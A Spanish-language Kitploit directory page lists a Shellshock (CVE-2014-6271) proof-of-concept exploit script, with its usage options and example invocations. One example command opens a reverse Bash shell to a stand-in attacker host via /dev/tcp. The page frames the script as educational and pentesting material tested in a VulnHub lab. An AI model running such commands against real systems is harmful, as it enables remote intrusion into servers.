Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-6271-Shellshock — Exploit de CVE-2014-6271 | por infrar3d | Kitploit
Herramientas/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

Exploit de CVE-2014-6271 | por infrar3d

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 5 mesesAún no revisado

CVE-2014-6271 Shellshock

xpl0ited por infrar3d

Este repositorio contiene un exploit de prueba de concepto para CVE-2014-6271 (Shellshock).

Shellshock es una vulnerabilidad crítica en GNU Bash donde variables de entorno especialmente diseñadas permiten la ejecución arbitraria de comandos.
Cuando un servidor web pasa cabeceras HTTP a scripts CGI que invocan Bash, un atacante puede inyectar comandos a través de esas cabeceras.

Uso:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

Ejemplos:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(probado en la máquina VulnHub "Hacksudo - Thor")

⚠️ Aviso ⚠️

Este software y código de prueba de concepto se proporciona solo con fines educativos y de investigación.

  • Los autores no son responsables de ningún uso indebido o daño causado por este programa.
  • No lo use contra ningún sistema sin permiso previo explícito.
  • El uso de estas herramientas para atacar objetivos sin consentimiento es ilegal.

Usted es responsable de cumplir con todas las leyes aplicables. Úselo ética y responsablemente.

Descargar herramienta